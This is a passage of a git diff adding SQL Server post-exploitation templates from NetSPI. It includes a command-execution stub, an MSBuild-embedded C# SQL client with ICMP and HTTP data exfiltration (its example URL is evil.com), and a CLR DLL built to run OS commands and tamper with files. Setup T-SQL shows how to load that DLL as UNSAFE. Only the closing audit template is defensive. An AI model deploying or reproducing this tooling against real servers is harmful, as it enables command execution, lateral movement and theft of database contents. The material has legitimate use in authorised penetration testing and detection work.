PLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!"; + system(pdata); + + return 1; +} diff --git a/templates/msbuild_sql_query.csproj b/templates/msbuild_sql_query.csproj new file mode 100644 index 0000000..fecf760 --- /dev/null +++ b/templates/msbuild_sql_query.csproj @@ -0,0 +1,690 @@ + + + + + + + + + + + + + "); + String MyQuery = Console.ReadLine().ToString(); + + // Collect multi-line command until "go" is given + string fullcommand = ""; + string connString = MyConnString; + while (MyQuery.ToLower() != "go") + { + fullcommand = fullcommand + "\n" + MyQuery; + + // Exit if requested + if(MyQuery.ToLower().Equals("exit") || MyQuery.ToLower().Equals("quit") || MyQuery.ToLower().Equals("bye")) + { + return "placeholder"; + } + + // Allow ability to set custom connection string + bool loadCheck = MyQuery.ToLower().Contains("setconn"); + if(loadCheck) + { + Console.Write("\n - Connection string set to:"); + string newcon = MyQuery.Replace("setconn ",""); + Console.Write("\n " + newcon + "\n"); + connString = newcon; + fullcommand = ""; + Console.Write("\nSQLCLIENT> "); + } + + // Allow ability to set custom output file + bool fileCheck = MyQuery.ToLower().Contains("setfile"); + if(fileCheck) + { + Console.Write("\nSetting output path to:"); + string newfile = MyQuery.Replace("setfile ",""); + Console.Write("\n" + newfile + "\n"); + filePath = newfile; + fullcommand = ""; + Console.WriteLine("----------"); + Console.Write("\nSQLCLIENT> "); + } + + // set target url for http payloads + bool urlCheck = MyQuery.ToLower().Contains("setexfilurl"); + if(urlCheck) + { + string targeturl = MyQuery.Replace("setexfilurl ",""); + Console.Write(" - Target url set to: " + targeturl); + Console.Write("\nSQLCLIENT> "); + } + + // set target url for http payloads + bool spnCheck = MyQuery.ToLower().Contains("listsqlspn"); + if(spnCheck) + { + // Create data table to store and display output + DataTable mytable = new DataTable(); + mytable.Clear(); + mytable.Columns.Add("Instance"); + mytable.Columns.Add("SamAccountName"); + // mytable.Columns.Add("servicePrincipalName"); + + // Setup LDAP query + string MyDC = System.Environment.GetEnvironmentVariable("logonserver").Replace("\\\\",""); + DirectoryEntry RootDirEntry = new DirectoryEntry("LDAP://" + MyDC + ":636",null,null,AuthenticationTypes.SecureSocketsLayer); + RootDirEntry.AuthenticationType = AuthenticationTypes.Secure; + Console.WriteLine(" - Querying " + MyDC + " domain controller for SQL Server SPNs...\n"); + using (DirectorySearcher ds = new DirectorySearcher(RootDirEntry)) + { + //ds.Filter = "(&(objectClass=user)(objectCategory=person))"; + ds.Filter = "(servicePrincipalName=*mssql*)"; + ds.SearchScope = SearchScope.Subtree; + ds.PageSize = 1000; + using (SearchResultCollection src = ds.FindAll()) + { + foreach (SearchResult sr in src) + { + try + { + foreach (string spn in sr.Properties["servicePrincipalName"]) + { + // Grab properties + string SamAccountName = sr.Properties["sAMAccountName"][0].ToString(); + int spnindex = spn.IndexOf('/'); + string ServiceType = spn.Substring(0, spnindex); + string partialInstance = spn.Substring(spnindex + 1); + + // Parse instance + try + { + int instanceindex = partialInstance.IndexOf(':'); + string computerName = partialInstance.Substring(0, instanceindex); + string instancePart = partialInstance.Substring(instanceindex + 1); + string instanceName = computerName + "\\" + instancePart; + + // Add comma for ports + decimal myDec; + var isNumber = decimal.TryParse(instancePart, out myDec); + if(isNumber) + { + instanceName = instanceName.Replace("\\",","); + } + + // Add record to output table + if(ServiceType.ToLower().Contains("mssql")){ + mytable.Rows.Add(new object[] {instanceName,SamAccountName}); + } + } + catch + { + } + } + } + catch + { + } + } + } + } + + // Display output of data table + DataRow[] currentRows = mytable.Select(null, null, DataViewRowState.CurrentRows); + + if (currentRows.Length < 1 ) + Console.WriteLine(" - No Current Rows Found"); + else + { + foreach (DataColumn column in mytable.Columns) + { + Console.Write(" {0}\t\t", column.ColumnName); + } + + Console.WriteLine("\t"); + + foreach (DataRow row in currentRows) + { + foreach (DataColumn column in mytable.Columns) + { + Console.Write(" {0}\t\t", row[column]); + } + + Console.WriteLine("\t"); + } + } + Console.Write("\nSQLCLIENT> "); + } + + // set target ip for icmp payloads + bool ipCheck = MyQuery.ToLower().Contains("setexfilip"); + if(ipCheck) + { + string targetip = MyQuery.Replace("setexfilip ",""); + Console.Write(" - Target ip set to: " + targetip); + Console.Write("\nSQLCLIENT> "); + } + + // set key for data encryption + bool keyCheck = MyQuery.ToLower().Contains("setenckey"); + if(keyCheck) + { + string mykey = MyQuery.Replace("setenckey ",""); + Console.Write(" - Encryption key set to: " + mykey); + Console.Write("\nSQLCLIENT> "); + } + + // Enabled exfil encryption + bool encdisabledCheck = MyQuery.ToLower().Contains("enableencryption"); + if(encdisabledCheck) + { + Console.Write(" - Enabled encryption of exfiltrated data."); + string payloadencryption = "true"; + Console.Write("\nSQLCLIENT> "); + } + + // Disable exfil encryption + bool encenabledCheck = MyQuery.ToLower().Contains("disableencryption"); + if(encenabledCheck) + { + Console.Write(" - Disabled encryption of exfiltrated data."); + string payloadencryption = "false"; + Console.Write("\nSQLCLIENT> "); + } + + // Allow ability to diable icmp exfiltratoin + bool icmpdisabledCheck = MyQuery.ToLower().Contains("disableicmp"); + if(icmpdisabledCheck) + { + Console.Write(" - ICMP data exfiltration disabled."); + string enabledicmp = "false"; + Console.Write("\nSQLCLIENT> "); + } + + // Allow ability to enable icmp exfiltratoin + bool icmpenabledCheck = MyQuery.ToLower().Contains("enableicmp"); + if(icmpenabledCheck) + { + Console.Write(" - ICMP data exfiltration enabled. Don't forget to set the exfilip."); + string enabledicmp = "true"; + Console.Write("\nSQLCLIENT> "); + } + + // Allow ability to diable http exfiltratoin + bool httpdisabledCheck = MyQuery.ToLower().Contains("disablehttp"); + if(httpdisabledCheck) + { + Console.Write(" - http data exfiltration disabled."); + string enabledicmp = "false"; + Console.Write("\nSQLCLIENT> "); + } + + // Allow ability to enable http exfiltratoin + bool httpenabledCheck = MyQuery.ToLower().Contains("enablehttp"); + if(httpenabledCheck) + { + Console.Write(" - http data exfiltration enabled. Don't forget to set the exfilurl."); + string enabledicmp = "true"; + Console.Write("\nSQLCLIENT> "); + } + + // Clear console if requested + if(MyQuery.ToLower().Equals("clear")) + { + Console.Clear(); + fullcommand = ""; + Console.WriteLine("----------"); + Console.Write("SQLCLIENT> "); + } + + // Clear console if requested + bool statusCheck = MyQuery.ToLower().Contains("status"); + if(MyQuery.ToLower().Equals("status")) + { + fullcommand = ""; + Console.WriteLine("-----------"); + Console.WriteLine("ConnString: " + connString); + Console.WriteLine(" User:"); + Console.WriteLine(" User Type:"); + Console.WriteLine("ICMP Exfil:"); + Console.WriteLine(" Target IP:"); + Console.WriteLine("HTTP Exfil:"); + Console.WriteLine("Target URL:"); + Console.WriteLine("Encryption:"); + Console.WriteLine(" Key:"); + Console.WriteLine("-----------"); + Console.Write("SQLCLIENT> "); + } + + // Provide help + bool helpCheck = MyQuery.ToLower().Contains("help"); + if(MyQuery.ToLower().Equals("help")){ + Console.WriteLine("\n"); + Console.WriteLine(" BELOW IS A LIST OF SUPPORTED COMMANDS"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: setconn"); + Console.WriteLine(" DESCRIPTION By default the connection string is harded coded. Use this command to change it on the fly."); + Console.WriteLine(" EXAMPLE 1 setconn Server=SERVER\\Instance;Database=Master;User ID=Username;Password=Pass123!;"); + Console.WriteLine(" EXAMPLE 2 setconn Server=SERVER\\Instance;Database=Master;Integrated Security=SSPI;"); + Console.WriteLine(" EXAMPLE 3 setconn Server=SERVER\\Instance;Database=Master;Integrated Security=SSPI;uid=domain\\user;pwd=Pass123!"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: listsqlspn"); + Console.WriteLine(" DESCRIPTION Query the default logon server (domain controller) for SQL Servers SPNs as the current domain user."); + Console.WriteLine(" EXAMPLE 1 listsqlspn"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: TSQL queries"); + Console.WriteLine(" DESCRIPTION Arbitrary TSQL query can be executed once a valid connection string is configured."); + Console.WriteLine(" Type the query, then \"go\", and press enter. Multi-line queries are supported."); + Console.WriteLine(" EXAMPLE SELECT @@VERSION"); + Console.WriteLine(" GO"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: setfile"); + Console.WriteLine(" DESCRIPTION By default, the output file is c:\\windows\\temp\\output.csv. Use this command to change it on the fly."); + Console.WriteLine(" EXAMPLE setfile c:\\windows\\temp\\output.csv"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: enablehttp"); + Console.WriteLine(" DESCRIPTION By default, HTTP exfiltration is disabled. If enabled, set the exfilurl as well."); + Console.WriteLine(" EXAMPLE enablehttp"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: disablehttp"); + Console.WriteLine(" DESCRIPTION By default, HTTP exfiltration is disabled. If enabled, set the exfilurl as well."); + Console.WriteLine(" EXAMPLE disablehttp"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: setexfilurl"); + Console.WriteLine(" DESCRIPTION This is the URL that data will be exfiltrated to via HTTP POST request in the id parameter."); + Console.WriteLine(" EXAMPLE setexilurl https://www.evil.com/"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: enableicmp"); + Console.WriteLine(" DESCRIPTION By default, ICMP exfiltration is disabled. If enabled, set the exfilip as well."); + Console.WriteLine(" EXAMPLE enableicmp"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: disableicmp"); + Console.WriteLine(" DESCRIPTION By default, ICMP exfiltration is disabled. If enabled, set the exfilip as well."); + Console.WriteLine(" EXAMPLE disableicmp"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: setexilip"); + Console.WriteLine(" DESCRIPTION By default, ICMP exfiltration is disabled. If enabled, set the IP to exfiltrate to as well."); + Console.WriteLine(" EXAMPLE setexilip 127.0.0.1"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: enableencryption"); + Console.WriteLine(" DESCRIPTION By default, ICMP/HTTP data exfiltration is done in cleartext, enabled AES payload encryption with this setting."); + Console.WriteLine(" Set a custom key using the \"setenckey\" command "); + Console.WriteLine(" EXAMPLE enableencryption"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: disableencryption"); + Console.WriteLine(" DESCRIPTION By default, ICMP/HTTP data exfiltration is done in cleartext, enabled AES payload encryption with this setting."); + Console.WriteLine(" Set a custom key using the \"setenckey\" command "); + Console.WriteLine(" EXAMPLE disableencryption"); + Console.WriteLine("\n"); + Console.WriteLine(" COMMAND: setenckey"); + Console.WriteLine(" DESCRIPTION By default, ICMP/HTTP data exfiltration is done in cleartext, enabled AES payload encryption with this setting."); + Console.WriteLine(" Set a custom key using the \"setenckey\" command "); + Console.WriteLine(" EXAMPLE setenckey mykeyhere"); + Console.WriteLine("\n"); + fullcommand = ""; + Console.WriteLine("----------"); + Console.Write("SQLCLIENT> "); + } + + // Show multi-line input + if((MyQuery.ToLower() != "clear") && (!spnCheck) && (!encdisabledCheck) && (!encenabledCheck) && (!urlCheck) && (!keyCheck) && (!ipCheck) && (!loadCheck) && (!fileCheck) && (!helpCheck) && (!httpenabledCheck) && (!httpdisabledCheck) && (!icmpenabledCheck) && (!icmpdisabledCheck) && (!statusCheck)) + { + Console.Write(" > "); + } + + // Collect additional query lines + MyQuery = Console.ReadLine().ToString(); + } + + // Create data table to store results + DataTable dt = new DataTable(); + + // Run query + try{ + + // Set connection string + if(connString.Equals("")) + { + connString = @"Server=server\instance;Database=Master;Integrated Security=SSPI;"; + } + + // Create new connection + SqlConnection conn = new SqlConnection(connString); + SqlCommand QueryCommand = new SqlCommand(fullcommand, conn); + conn.Open(); + + // Execute query and read data into data table + SqlDataAdapter da = new SqlDataAdapter(QueryCommand); + da.Fill(dt); + + // Display output of data table + DataRow[] currentRows = dt.Select(null, null, DataViewRowState.CurrentRows); + + // Display results to screen + if (currentRows.Length < 1 ) + { + Console.WriteLine("\nNo rows returned."); + }else{ + Console.WriteLine("\n QUERY RESULTS:\n"); + + foreach (DataColumn column in dt.Columns) + { + Console.Write("\t{0}", column.ColumnName); + } + + Console.WriteLine("\t"); + + foreach (DataRow row in currentRows) + { + foreach (DataColumn column in dt.Columns) + { + Console.Write("\t{0}", row[column]); + } + + Console.WriteLine("\t"); + } + + // Write results to csv + StringBuilder fileContent = new StringBuilder(); + if(filePath.Equals("")){ + filePath = "c:\\Windows\\Temp\\output.csv"; + } + + foreach (var col in dt.Columns) + { + fileContent.Append(col.ToString() + ","); + } + + fileContent.Replace(",", System.Environment.NewLine, fileContent.Length - 1, 1); + foreach (DataRow dr in dt.Rows) + { + foreach (var column in dr.ItemArray) + { + fileContent.Append("\"" + column.ToString() + "\","); + } + + fileContent.Replace(",", System.Environment.NewLine, fileContent.Length - 1, 1); + } + + try{ + + // write file output + System.IO.File.WriteAllText(filePath, fileContent.ToString()); + Console.WriteLine("\nSuccessfully wrote query output to " + filePath); + + // encrypt exfil encryption + string enableEncryption = "false"; + string mySharedSecret = "changethis"; + string encrypted64 = EncryptStringAES(fileContent.ToString(), mySharedSecret); + + // send results in icmp + string enableicmp = "false"; + if(enableicmp == "true") + { + // https://docs.microsoft.com/en-us/dotnet/api/system.net.networkinformation.ping?view=netframework-4.7.2 + string ipaddress = "127.0.0.1"; + Ping pingSender = new Ping (); + PingOptions options = new PingOptions (); + + // Use the default Ttl value which is 128, + // but change the fragmentation behavior. + options.DontFragment = true; + + // Create a buffer of 32 bytes of data to be transmitted. + string data = fileContent.ToString(); + if(enableEncryption == "true"){ + data = encrypted64; + } + byte[] buffer = Encoding.ASCII.GetBytes (data); + int timeout = 120; + PingReply reply = pingSender.Send (ipaddress, timeout, buffer, options); + if (reply.Status == IPStatus.Success) + { + //Console.WriteLine ("Address: {0}", reply.Address.ToString ()); + //Console.WriteLine ("RoundTrip time: {0}", reply.RoundtripTime); + //Console.WriteLine ("Time to live: {0}", reply.Options.Ttl); + //Console.WriteLine ("Don't fragment: {0}", reply.Options.DontFragment); + //Console.WriteLine ("Buffer size: {0}", reply.Buffer.Length); + } + } + + // Send results in http post + string enablehttp = "false"; + if(enablehttp == "true") + { + try{ + string mydata = "id=my data is here."; + string myurl = "http://127.0.0.1"; + byte[] postArray1 = Encoding.ASCII.GetBytes(mydata); + Console.WriteLine("Uploading to {0} ...", myurl); + WebClient myWebClient1 = new WebClient(); + myWebClient1.Headers.Add("Content-Type","application/x-www-form-urlencoded"); + byte[] responseArray1 = myWebClient1.UploadData(myurl,"POST",postArray1); + Console.WriteLine("\nResponse received was :{0}", Encoding.ASCII.GetString(responseArray1)); + }catch{ + Console.WriteLine("\nFail buckets, couldnt connect to webserver"); + } + } + }catch{ + Console.WriteLine("\nFailed to write query output to " + filePath); + } + } + } + catch(SqlException ex) + { + Console.WriteLine(ex.Errors[0].Message); + } + + RunQuery(connString,filePath); + return "placeholder"; + } + } + ]]> + + + + diff --git a/templates/sqlc2cmds.cs b/templates/sqlc2cmds.cs new file mode 100644 index 0000000..f669cc0 --- /dev/null +++ b/templates/sqlc2cmds.cs @@ -0,0 +1,767 @@ +/* + +Author: Scott Sutherland, NetSPI (2018) +Application: SQLC2CMDS.dll +Description: + +This .net DLL is intended to be imported into SQL Server and used during post exploitation activities. +However, it could also be used for legitimate purposes. Long term this is intended to be the core +set of functions used by the SQLC2 project being roled into PowerUpSQL. + +It currently supports: +* TSQL queries as current user +* TSQL queries as the service account (implicitly sysadmin) +* Executing commands via C# wrapper / WMI +* Read/Write/Remove text files +* Encryption/Decryption of strings using AES + +Pending functions: +* Read/Write binary files +* Read/Write to registry +* Run powershell commands without powershell.exe +* Modify query functions too accept remote server target +* Shellcode injection +* Dumping LSA Secrets +* POST/GET data from a remote web server +* Download and execute script from a web server +* Upload / Download file functions for SQLC2 + +Additional Instructions: + +1. Compile the DLL. Below is an example. However, be aware that this we written and testing using the .net 4 CLR. + For more information on CLR versions visit: https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/versions-and-dependencies + + C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /Reference:C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll SQLC2CMDS.cs + C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library SQLC2CMDS.cs + +2. Enale CLR on the server and select the MSDB database. MSDB data base is flagged as trustworthy by default which is a requirement for using CLRs in SQL Server. + + -- Select the msdb database + use msdb + + -- Enable show advanced options on the server + sp_configure 'show advanced options',1 + RECONFIGURE + GO + + -- Enable clr on the server + sp_configure 'clr enabled',1 + RECONFIGURE + GO + +3. As a sysadmin import SQLC2CMDS.dll. + + -- Import the assembly + CREATE ASSEMBLY SQLC2CMDS + FROM 'c:\temp\SQLC2CMDS.dll' + WITH PERMISSION_SET = UNSAFE; + +4. Map the SQLC2CMDS to stored procedures. + + CREATE PROCEDURE [dbo].[run_query] @execTsql NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[run_query]; + GO + CREATE PROCEDURE [dbo].[run_query2] @execTsql NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[run_query2]; + GO + CREATE PROCEDURE [dbo].[run_command] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[run_command]; + GO + CREATE PROCEDURE [dbo].[run_command_wmi] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[run_command_wmi]; + GO + CREATE PROCEDURE [dbo].[run_shellcode] @execShellcode NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[run_shellcode]; + GO + CREATE PROCEDURE [dbo].[write_file] @filePath NVARCHAR (4000),@fileContent NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[write_file]; + GO + CREATE PROCEDURE [dbo].[read_file] @filePath NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[read_file]; + GO + CREATE PROCEDURE [dbo].[remove_file] @filePath NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[remove_file]; + GO + CREATE PROCEDURE [dbo].[EncryptThis] @MyString NVARCHAR (4000),@MyKey NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[EncryptThis]; + GO + CREATE PROCEDURE [dbo].[DecryptThis] @MyString NVARCHAR (4000),@MyKey NVARCHAR (4000) AS EXTERNAL NAME [SQLC2CMDS].[StoredProcedures].[DecryptThis]; + GO + +5. Run tests for each of the available stored procedure. + + -- Runs as the current user + run_query 'select system_user' + run_query 'select * from master..sysdatabases' + + -- Runs as the service account + run_query2 'select system_user' + run_query2 'select * from master..sysdatabases' + + -- Runs with output + run_command 'whoami' + + -- Runs without output + run_command_wmi 'c:\windows\system32\cmd.exe /c "whoami > c:\temp\doit1.txt"' + + -- Write text to a file + write_file 'c:\temp\blah21.txt','stuff2' + + -- Read text from a file + read_file 'c:\temp\blah21.txt' + + -- Remove a file + remove_file 'c:\temp\blah21.txt' + + -- Encrypt a string with provided key + encryptthis 'hello','password' + + -- Decrypt an encrypted string with provided key + decryptthis 'EAAAAIUSQtbiDvP3c8L/fuNoQ8q/zUwMD8Cd/UbCmiVnopTX','password' + +5. Remove all added stored procedures and the SQLC2CMDS assembly. + + drop procedure run_query + drop procedure run_query2 + drop procedure run_command + drop procedure run_command_wmi + drop procedure run_shellcode + drop procedure write_file + drop procedure read_file + drop procedure remove_file + drop procedure encryptthis + drop procedure decryptthis + drop assembly SQLC2CMDS + */ + +using System; +using System.Collections; +using System.Collections.Generic; +using System.Collections.ObjectModel; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Management; +//using System.Management.Automation; +//using System.Management.Automation.Runspaces; +//using System.Management.Automation.Internal; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Security.Cryptography; +using System.Text; +using System.Threading.Tasks; +using Microsoft.SqlServer.Server; + + + +// -------------------------------------------------- +// Class for converting clr system.type to sqldbtype +// Source: https://stackoverflow.com/questions/35745226/net-system-type-to-sqldbtype +// -------------------------------------------------- +public static class SqlHelper +{ + private static Dictionary typeMap; + + // Create and populate the dictionary in the static constructor in mappings may be wrong + static SqlHelper() + { + typeMap = new Dictionary(); + + typeMap[typeof(string)] = SqlDbType.NVarChar; + typeMap[typeof(char[])] = SqlDbType.NVarChar; + typeMap[typeof(byte)] = SqlDbType.TinyInt; + typeMap[typeof(byte[])] = SqlDbType.Image; + //typeMap[typeof(sbyte)] = SqlDbType.TinyInt; - not sure of sqldbtype + //typeMap[typeof(ushort)] = SqlDbType.TinyInt; - not sure of sqldbtype + //typeMap[typeof(uint)] = SqlDbType.TinyInt; - not sure of sqldbtype + //typeMap[typeof(ulong)] = SqlDbType.TinyInt; - not sure of sqldbtype + //typeMap[typeof(DateSpan)] = SqlDbType.TinyInt; - not sure of sqldbtype + typeMap[typeof(short)] = SqlDbType.SmallInt; + typeMap[typeof(int)] = SqlDbType.Int; + typeMap[typeof(long)] = SqlDbType.BigInt; + typeMap[typeof(bool)] = SqlDbType.Bit; + typeMap[typeof(DateTime)] = SqlDbType.DateTime2; + typeMap[typeof(DateTimeOffset)] = SqlDbType.DateTimeOffset; + typeMap[typeof(decimal)] = SqlDbType.Money; + typeMap[typeof(float)] = SqlDbType.Real; + typeMap[typeof(double)] = SqlDbType.Float; + typeMap[typeof(TimeSpan)] = SqlDbType.Time; + } + + // Non-generic argument-based method + public static SqlDbType GetDbType(Type giveType) + { + // Allow nullable types to be handled + giveType = Nullable.GetUnderlyingType(giveType) ?? giveType; + + if (typeMap.ContainsKey(giveType)) + { + return typeMap[giveType]; + } + + throw new ArgumentException("is not a supported .NET class"); + } + + // Generic version + public static SqlDbType GetDbType() + { + return GetDbType(typeof(T)); + } +} + + +// -------------------------------------------------- +// Class for most of the SQLC2CMDS stored procedures +// -------------------------------------------------- +public partial class StoredProcedures +{ + + ////////////////////////////////////////////////////////////////////////////////////////////////////// + // Common functions ////////////////////////////////////////////////////////////////////////////////// + ////////////////////////////////////////////////////////////////////////////////////////////////////// + + // -------------------------------------------------- + // Function - run_query + // -------------------------------------------------- + // https://msdn.microsoft.com/en-us/library/9197xfyw(v=vs.110).aspx + // https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqlconnectionstringbuilder(v=vs.110).aspx + // No error handling when object does not exist + [Microsoft.SqlServer.Server.SqlProcedure] + public static void run_query (SqlString execTsql) + { + // Run as calling SQL/Windows login + using(SqlConnection connection = new SqlConnection("context connection=true")) + { + connection.Open(); + SqlCommand command = new SqlCommand(execTsql.ToString(), connection); + SqlContext.Pipe.ExecuteAndSend(command); + connection.Close(); + } + } + + // -------------------------------------------------- + // Function - run_query2 + // -------------------------------------------------- + // https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqldatareader(v=vs.80).aspx + // https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/retrieving-data-using-a-datareader + // https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqldatarecord(v=vs.110).aspx + // http://sharpfellows.com/post/Returning-a-DataTable-over-SqlContextPipe + // https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqldatareader.getvalues(v=vs.110).aspx + // Need to add auto identification of the current instance. + // No error handling when object does not exist. Need to add variables so it can be used as an alternative to ad-hoc queries. + [Microsoft.SqlServer.Server.SqlProcedure] + public static void run_query2 (SqlString execTsql) + { + + // user connection string builder here, accept query, server, current, user, password - execute as system by default, accept windows creds, sql creds + + // Connection string + using (SqlConnection connection = new SqlConnection(@"Data Source=MSSQLSRV04\SQLSERVER2014;Initial Catalog=master;Integrated Security=True")) + { + connection.Open(); + SqlCommand command = new SqlCommand(execTsql.ToString(), connection); + command.CommandTimeout = 240; + SqlDataReader reader = command.ExecuteReader(); + + // Create List for Columns + List OutputColumns = new List(reader.FieldCount); + + // Get schema + DataTable schemaTable = reader.GetSchemaTable(); + + // Get column names, types, and sizes from reader + for(int i=0;i +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$ +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication + +Write access appears to be recursive, with the exception of: +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQLServer\ExtendedProcedures + +Solution +-------- +An undocumentated registry key exists that allows local administrators to set a white list of registry locations that can be read/written +to by non sysadmin logins. Simply add the registry location you wish to white list to registry keys below. + +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQLServer\ExtendedProcedures\ +Xp_regread Allowed Paths +REG_MULTI_SZ + +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQLServer\ExtendedProcedures\ +Xp_regwrite Allowed Paths +REG_MULTI_SZ + +After the registry updates are made the only thing restricting access are the privileges assign to the SQL Server service account. + +Source: https://support.microsoft.com/en-us/kb/887165 diff --git a/templates/tsql/Audit Command Execution Template.sql b/templates/tsql/Audit Command Execution Template.sql new file mode 100644 index 0000000..bec1f36 --- /dev/null +++ b/templates/tsql/Audit Command Execution Template.sql @@ -0,0 +1,144 @@ +/* + Script Name: Audit Command Execution Template.sql + Description: This TSQL script can be used to configure SQL Server to log events commonly associated with operating system command execution to the Windows Application log. + Author: Scott Sutherland (@_nullbind), 2017 NetSPI + + SIEM Cheatsheet for Potentially Malicious Events in SQL Server + + Windows Application Log + Event ID: 15457 + Description: This event is associated with server configuration changes. Watch for the following configuration changes: + + Configuration option 'external scripts enabled' changed from 0 to 1. Run the RECONFIGURE statement to install. + Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install. + Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install. + Configuration option 'clr strict security' changed from 0 to 1. Run the RECONFIGURE statement to install. + Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. + Configuration option 'Ad Hoc Distributed Queries' changed from 0 to 1. Run the RECONFIGURE statement to install. + + Windows Application Log + 